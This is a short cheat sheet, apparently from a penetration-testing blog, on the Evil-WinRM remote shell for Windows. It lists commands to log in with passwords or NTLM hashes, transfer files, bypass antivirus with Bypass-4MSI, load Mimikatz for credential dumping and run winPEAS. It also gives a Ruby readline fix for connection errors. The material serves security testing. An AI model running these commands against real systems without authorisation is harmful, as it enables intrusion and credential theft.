Evil-WinRM on Kali Linux

Evil-WinRM is a security tool that penetration testers and ethical hackers often use when assessing Windows environments. It’s basically a Windows Remote Management (WinRM) client with extra features designed to make post-exploitation easier.

WinRM itself is a legitimate Microsoft service that allows administrators to remotely manage Windows machines using PowerShell. Evil-WinRM takes advantage of that same service, but instead of just providing standard management features, it gives an attacker-friendly interface with built-in tools to run commands, upload and download files, and execute PowerShell scripts directly on the target system.

In short, Evil-WinRM is a specialized shell that helps security professionals (or malicious attackers, if abused) gain interactive access to a Windows machine once they have valid credentials, making it a common tool in penetration testing and red team operations.

Evil-WinRM commands

<!-- Use Password -->
evil-winrm -i <ipaddress> -u <username> -p <password>
    
<!-- Use Hash (-H takes the hash; lowercase -h prints help) -->
evil-winrm -i <ipaddress> -u <username> -H <hash>

<!-- Use Public/Private Key -->
evil-winrm -i <ipaddress> -c <public-key> -k <private-key>
    
<!-- Once logged into target PC -->
upload filename.ext
download filename.ext

<!-- Bypass Antivirus -->
Bypass-4MSI
Invoke-Mimikatz.ps1

<!-- Invoke a binary -->
Invoke-Binary /opt/winPEASany.exe

<!-- If you get connection errors, apply this fix -->
sudo apt install libreadline-dev
wget https://ftp.ruby-lang.org/pub/ruby/2.7/ruby-2.7.3.tar.gz
tar -xf ruby-2.7.3.tar.gz
cd ruby-2.7.3/ext/readline
ruby ./extconf.rb
make

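<!-- Back up the installed readline.so before overwriting it -->
sudo cp /usr/lib/x86_64-linux-gnu/ruby/3.3.0/readline.so /usr/lib/x86_64-linux-gnu/ruby/3.3.0/readline.so.bk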
sudo cp -f readline.so /usr/lib/x86_64-linux-gnu/ruby/3.3.0/readline.so

<!-- The install instructions work, I just can't get connected. -->
				
			
